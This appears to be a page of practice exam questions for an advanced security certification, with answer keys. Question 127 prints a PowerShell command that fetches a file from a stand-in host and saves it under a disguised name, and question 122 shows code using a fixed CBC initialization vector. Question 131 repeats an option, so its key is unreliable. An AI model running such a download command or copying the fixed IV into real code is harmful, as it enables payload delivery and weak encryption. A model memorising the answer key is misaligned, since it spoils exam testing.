QUESTION 121
An organization notices a significant increase in the number of vulnerable systems. The security team determines that several applications are not receiving security patches. These applications are not being tracked by administrators, but the applications appear to be valid. Which of the following should be updated to reflect the status of applications in the environment?
A. Risk register
B. SIEM
C. SBOM
D. CMDB
Correct Answer: D
QUESTION 122
The following vulnerability was detected during a recent SAST scan of an application that provides an encrypted tunnel between sites:
Cipher Block Chaining Initialization Vector must be unpredictable.
This vulnerability was found on the following lines of the source code:
iv = b”CompTIAIV202512″
cipher= Cipher (AIgorithms.AES(key), modes.CBC(iv))
Which of the following is the potential impact of this vulnerability?
A. An attacker could derive plaintext from the protected data.
B. An attacker could predict future key material.
C. An attacker could tamper with the value sent in the Initialization Vector variable.
D. An attacker could use a Dos by predicting the Initialization Vector and tampering with its value.
Correct Answer: A
QUESTION 123
The Chief Information Security Officer (CISO)reviews some reports indicating that the length of time to patch endpoints with vulnerabilities has been steadily increasing. Many endpoints are missing security agents, and the number of unapproved BYOD endpoints has increased. Which of the following would be best to address the CISO’s security concerns?
A. Using an Always On VPN for remote staff to receive patches faster
B. Implementing Conditional Access with device certifications and compliance requirements
C. Writing a formal BYOD policy to enforce application containerization and receive board approval
D. Using compliance baselines in the MDM to ensure all endpoints to receive the required agents
Correct Answer: B
QUESTION 124
An organization identified a zero-day vulnerability in a commonly used open-source software package and is investigating whether this package was used in its applications. Which of the following sources is the most beneficial for the organization to review?
A. Interactive application security testing report
B. Validated software bill of materials
C. Software composition analysis report
D. Comprehensive data flow diagram
Correct Answer: C
QUESTION 125
A government agency implements a configuration that disables cellular network access on government issued devices while roaming internationally. The agency issues mobile hotspots and requires employees to use them for internet access. Which of the following best describes the agency’s rationale?
A. To protect against SIM hijack vulnerabilities
B. To defend from carrier OTA attack vectors
C. To block malicious radio connections
D. To prevent attempts to downgrade the protocol to legacy 3G
E. To filter directed electromagnetic interference
Correct Answer: B
QUESTION 126
During an audit at an organization, auditors find that developers are able to promote code to production. The auditors request a full review of all production changes. Which of the following should the organization implement to prevent the promotion of code to production without appropriate testing and approvals?
A. Branch protection
B. Centralized code repositories
C. Interactive application security testing
D. Change control board
Correct Answer: D
QUESTION 127
A security analyst is investigating an EDR alert and notices the following commands from the shell:
PS > iwr -uri http://domain.com/happy.jpg -outfile .important.url
The only artifact that the analyst has access to is a network packet capture. Which of the following actions would most likely confirm whether the file is malicious?
A. Reviewing the payload for a digital signature
B. Acquiring memory from an endpoint for analysis
C. Confirming that the contents of /etc/passwd were transmitted
D. Observing MZ in the binary stream header
Correct Answer: D
QUESTION 128
A company configures its endpoints to use Secure Boot. However, a penetration tester is able to demonstrate their ability to shim malicious drivers into the boot process. Which of the following techniques is the best way to mitigate the risk of reoccurrence?
A. UEFI access identification and authentication
B. Boot image encryption and verification
C. Peripheral monitoring and reporting
D. Measurement and attestation
Correct Answer: D
QUESTION 129
An ISAC supplied recent threat intelligence information about pictures used on social media that provide reconnaissance of systems in use in secure facilities. ln response, the Chief Information Security Officer (CISO) wants several configuration changes implemented via the MDM to ensure the following:
1. Camera functions and location services are blocked for corporate mobile devices.
2. All social media is blocked on the corporate and guest wireless networks.
Which of the following is the CISO practicing to safeguard against the threat?
A. Adversary emulation
B. Operational security
C. Open-source intelligence
D. Social engineering
Correct Answer: B
QUESTION 130
A company needs to quickly assess whether software deployed across the company’s global corporate network contains specific software libraries. Which of the following best enables the company’s SOC to respond quickly when such an assessment is required?
A. Maintaining SAST/DAST reports on a server with access restricted to SOC staff
B. Contractually requiring all software vendors to attest to third-party risk mitigations
C. Requiring all suppliers and internal developers to implement a thorough SBoM
D. Implementing a GRC tool to maintain a list of all software vendors and internal developers
Correct Answer: C
QUESTION 131
An organization recently implemented a new email DLP solution. Emails sent from company email addresses to matching personal email addresses generated a large number of alerts, but the content of the emails did not include company data. The security team needs to reduce the number of emails sent without blocking all emails to common personal email services. Which of the following should the security team implement first?
A. Automatically quarantine outgoing email.
B. Create an acceptable use policy.
C. Enforce email encryption standards.
D. Create an acceptable use policy.
Correct Answer: B
QUESTION 132
A SOC analyst must perform threat-modeling activities for a large media organization that has the following characteristics:
1. The organization maintains operations around the world in support of multiple entertainment networks.
2. Development activities for the organization’s web-based platforms occur overseas.
3. Previous information security failures within the organization have been publicly disclosed.
Which of the following actions is the best for the analyst to consider in the early phases of threat modeling?
A. Implementing STIX and TAXII
B. Conducting an OSINT assessment
C. Reviewing user behavior analytics and identity logs
D. Performing a supply chain analysis
Correct Answer: B
QUESTION 133
A systems engineer is configuring SSO for a business that will be using SaaS applications for its remote-only workforce. Privileged actions in Saas applications must be allowed only from corporate mobile devices that meet minimum security requirements, but BYOD must also be permitted for other activity. Which of the following would best meet this objective?
A. Block any connections from outside the business’s network security boundary.
B. Install machine certificates on corporate devices and perform checks against the clients.
C. Configure device attestations and continuous authorization controls.
D. Deploy application protection policies using a corporate, cloud-based MDM solution.
Correct Answer: C
QUESTION 134
An administrator needs to create and deploy certificate templates to standardize the process of requesting and issuing certificates for an organization. Which of the following considerations would best help the administrator decide how many different templates are needed?
A. The number of different operating systems for each type of client certificate to be issued
B. The types and variations of Subject Alternative Names to be included
C. The size of the organization in terms of maximum potential certificates to be issued
D. The total set of extended key usages required for the organization
Correct Answer: D
QUESTION 135
A cloud engineer needs to identify appropriate solutions to:
1. Provide secure access to internal and external cloud resources.
2. Eliminate split-tunnel traffic flows.
3. Enable identity and access management capabilities.
Which of the following solutions is the most appropriate?
A. Microsegmentation
B. PAM
C. SD-WAN
D. SASE
Correct Answer: D
QUESTION 136
An organization would like to increase the effectiveness of its incident response process across its multiplatform environment. A security engineer needs to implement the improvements using the organization’s existing incident response tools. Which of the following should the security engineer use?
A. Playbooks
B. Event collectors
C. Centralized logging
D. Endpoint detection
Correct Answer: A
QUESTION 137
A threat intelligence company’s business objective is to allow customers to integrate data directly to different TIPs through an API. The company would like to address as many of the following objectives as possible:
1. Reduce compute spend as much as possible.
2. Ensure availability for all users.
3. Reduce the potential attack surface.
4. Ensure the integrity of the data provided.
Which of the following should the company consider to best meet the objectives?
A. Configuring a unique API secret key for accounts
B. Publishing a list of IOCs on a public directory
C. Implementing rate limiting for each registered user
D. Providing a hash of all data that is made available
Correct Answer: B
QUESTION 138
Which of the following enables the meaningful manipulation of encrypted data when the processor does not know the encryption key?
A. Simultaneous authentication of equals
B. Envelope encryption
C. Authenticated encryption with associated data
D. Homomorphic encryption
Correct Answer: D
QUESTION 139
A company recently experienced a ransomware attack Although the company performs systems and data backup on a schedule that aligns with its RPO requirements, the backup administrator could not recover critical systems and data from its offline backups to meet the RPO. Eventually, the systems and data were restored with information that was six months outside of RPO requirements. Which of the following actions should the company take to reduce the risk of a similar attack?
A. Encrypt and label the backup tapes with the appropriate retention schedule before they are sent to the off-site location.
B. Implement a business continuity process that includes reverting manual business processes.
C. Perform regular disaster recovery testing of IT and non-IT systems and process.
D. Carry out a tabletop exercise to update and verify the RACI matrix with IT and critical business functions.
Correct Answer: C
QUESTION 140
A manufacturing plant is updating its IT services. During discussions, the senior management team created the following list of considerations:
1. Staff turnover is high and seasonal.
2. Extreme conditions often damage endpoints.
3. Losses from downtime must be minimized.
4. Regulatory data retention requirements exist.
Which of the following best addresses the considerations?
A. Establishing further environmental controls to limit equipment damage
B. Using a non-persistent virtual desktop interface with thin clients
C. Deploying redundant file servers and configuring database journaling
D. Maintaining an inventory of spare endpoints for rapid deployment
Correct Answer: B
We use cookies to improve your experience, including essential cookies required for the website to function. By continuing, you agree to our use of cookies. Learn more.
We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.
Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.
Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.
Advertisement cookies are used to provide visitors with customised advertisements based on the pages you visited previously and to analyse the effectiveness of the ad campaigns.
Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.